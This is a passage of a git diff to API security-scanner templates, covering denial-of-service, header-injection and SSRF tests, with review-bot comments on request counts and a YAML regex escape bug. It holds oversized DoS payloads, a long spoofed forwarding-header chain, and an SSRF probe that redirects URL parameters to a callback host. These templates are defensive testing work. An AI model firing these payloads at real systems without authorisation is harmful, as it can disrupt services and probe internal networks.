a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a@a@a.com" + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/ExpensiveSearch.yml b/Lack-of-Resources-and-Rate-Limiting/ExpensiveSearch.yml index 12c34100f..885d262de 100644 --- a/Lack-of-Resources-and-Rate-Limiting/ExpensiveSearch.yml +++ b/Lack-of-Resources-and-Rate-Limiting/ExpensiveSearch.yml 
@@ -69,12 +69,12 @@ api_selection_filters: for_one: key: regex: "(^q$|^query$|^search$|^keyword$)" - extract: searchKey + extractMultiple: searchKey - query_param: for_one: key: regex: "(^q$|^query$|^search$|^keyword$)" - extract: searchKey + extractMultiple: searchKey wordLists: searchParamValues: - "999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999" @@ -127,9 +127,11 @@ execute: - failure: exit - req: - modify_query_param: - searchKey: ${searchParamValues} + ${searchKey}: ${searchParamValues} + for_each_combination: true - modify_body_param: - searchKey: ${searchParamValues} + ${searchKey}: ${searchParamValues} + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/HTTPHeaderInjectionDoS.yml b/Lack-of-Resources-and-Rate-Limiting/HTTPHeaderInjectionDoS.yml index 44abc8cf4..f444618e3 100644 --- a/Lack-of-Resources-and-Rate-Limiting/HTTPHeaderInjectionDoS.yml +++ b/Lack-of-Resources-and-Rate-Limiting/HTTPHeaderInjectionDoS.yml 
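Review bot: `for_each_combination: true` is introduced in the `@@ -127,9 +127,11 @@` hunk with no comment saying how many requests it produces. The payload it fans out is the very large numeric string kept as context under `searchParamValues` in the `@@ -69,12 +69,12 @@` hunk. Presumably the engine now sends one request per matched key and word-list entry, so an endpoint carrying several of `q`, `query`, `search`, `keyword` receives more of these oversized requests than before. Please confirm that and state it in the template, e.g. `# one request per matched searchKey and searchParamValues entry; keep the list short`. The same undocumented flag appears in the HTTPHeaderInjectionDoS and StandardSSRF hunks further down, and the `execute` block starts before this hunk.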
@@ -67,7 +67,7 @@ api_selection_filters:
 for_one:
 key:
 regex: "^X-Forwarded-For$|^X-Real-IP$|^X-Forwarded-Host$|^X-Cluster-Client-IP$|^Forwarded$|^CF-Connecting-IP$|^True-Client-IP$|^X-Original-Forwarded-For$|^X-Client-IP$|^Client-IP$|^X-Azure-Client-IP$|^X-Azure-ClientIP$|^X-Akamai-Client-IP$|^X-Originating-IP$|^X-Remote-IP$|^X-Appengine-User-IP$|^Via$|^X-Host$|^X-ProxyUser-Ip$|^X-Forwarded$|^X-Real-IP-From$|^CF-Connecting-IPv6$|^Remote-Addr$|^X-Client-Public-IP$|^X-Forwarded-For-IP$|^X-Cloudflare-CDN-Loop$|^X-Coming-From$|^X-Originating-URL$|^X-Client-Connection-IP$"
- extract: userKey
+ extractMultiple: userKey
 value:
 regex: "\b(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b"
 extract: userVal
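Review bot: In the context line `regex: "\b(?:25[0-5]|…)\b"` the `\b` sits inside a double-quoted YAML scalar, where it is the escape for a backspace character rather than a regex word boundary; the dots on the same line are already doubled as `\\.`. Unless the template loader bypasses standard YAML escape handling, the value filter only matches an address wrapped in literal backspace characters, so this template would select no API and the `extractMultiple` change would never take effect. Writing both anchors as `\\b` makes the pattern match what was intended. Separately, `userKey` can now hold several header names while `userVal` is still a single `extract`, so it is worth confirming that nothing later pairs the two one-to-one.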
@@ -85,7 +85,8 @@ execute: - failure: exit - req: - modify_header: - userKey: "1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 
1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1" + ${userKey}: "1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 
1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1" + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/QueryParamArrayBombingDoS.yml b/Lack-of-Resources-and-Rate-Limiting/QueryParamArrayBombingDoS.yml index 51adde715..c4b3bd943 100644 --- a/Lack-of-Resources-and-Rate-Limiting/QueryParamArrayBombingDoS.yml +++ b/Lack-of-Resources-and-Rate-Limiting/QueryParamArrayBombingDoS.yml @@ -68,7 +68,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal execute: 
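Review bot: The long `1.1.1.1, …` header value is repeated verbatim on the removed and added lines of the `@@ -85,7 +85,8 @@` hunk, which hides the one real change (`userKey:` to `${userKey}:`) and makes the payload size hard to judge in review. ExpensiveSearch.yml in this same commit keeps its payload under `wordLists` and refers to it as `${searchParamValues}`. Defining this value once in the same way and writing `${userKey}: ${forwardedChain}` would keep later diffs to a single short line, assuming a one-entry word list behaves like the inline literal. `forwardedChain` is a name made up for this note, and the `req` block continues outside the hunk.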
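Review bot: QueryParamArrayBombingDoS.yml gets only the filter-side change: `key: regex: ".*"` now feeds `extractMultiple: userKey`, but unlike the other templates in this commit there is no second hunk rewriting its `execute` block to the `${userKey}:` form with `for_each_combination: true`. The `execute` body lies outside the hunk, so this may already be handled there. If it still uses the single-key form, the multi-valued variable is presumably either ignored or applied differently from what the filter now implies. Because `.*` matches every query parameter, a comment stating the expected number of requests per endpoint would also help operators size the run against a live target.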
diff --git a/Server-Side-Request-Forgery/StandardSSRF.yml b/Server-Side-Request-Forgery/StandardSSRF.yml index 258d18077..ee52ca8eb 100644 --- a/Server-Side-Request-Forgery/StandardSSRF.yml +++ b/Server-Side-Request-Forgery/StandardSSRF.yml @@ -35,14 +35,14 @@ api_selection_filters: for_one: key: regex: .* - extract: param_key + extractMultiple: param_key value: regex: http - query_param: for_one: key: regex: .* - extract: param_key + extractMultiple: param_key value: regex: http @@ -59,9 +59,11 @@ execute: redirect_url: "${redirect_urls}" - follow_redirect: true - modify_query_param: - param_key: "https://test-services.akto.io/${random_uuid}" + ${param_key}: "https://test-services.akto.io/${random_uuid}" + for_each_combination: true - modify_body_param: - param_key: "https://test-services.akto.io/${random_uuid}" + ${param_key}: "https://test-services.akto.io/${random_uuid}" + for_each_combination: true validate: response_code: gte: 200
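Review bot: In the `@@ -59,9 +59,11 @@` hunk every combination writes `https://test-services.akto.io/${random_uuid}`, and nothing visible says whether `${random_uuid}` is regenerated for each combination. With `key: regex: .*` and `extractMultiple` in the `@@ -35,14 +35,14 @@` hunk, several URL-valued parameters of one endpoint can now be rewritten. If they share one token, a callback hit cannot be traced to the parameter that caused the server-side fetch, which makes the finding harder to triage and fix. Please confirm the token is per request and note it next to the payload, e.g. `# random_uuid is unique per combination so a callback maps to one parameter`. The `validate` block appears to continue past the end of the hunk.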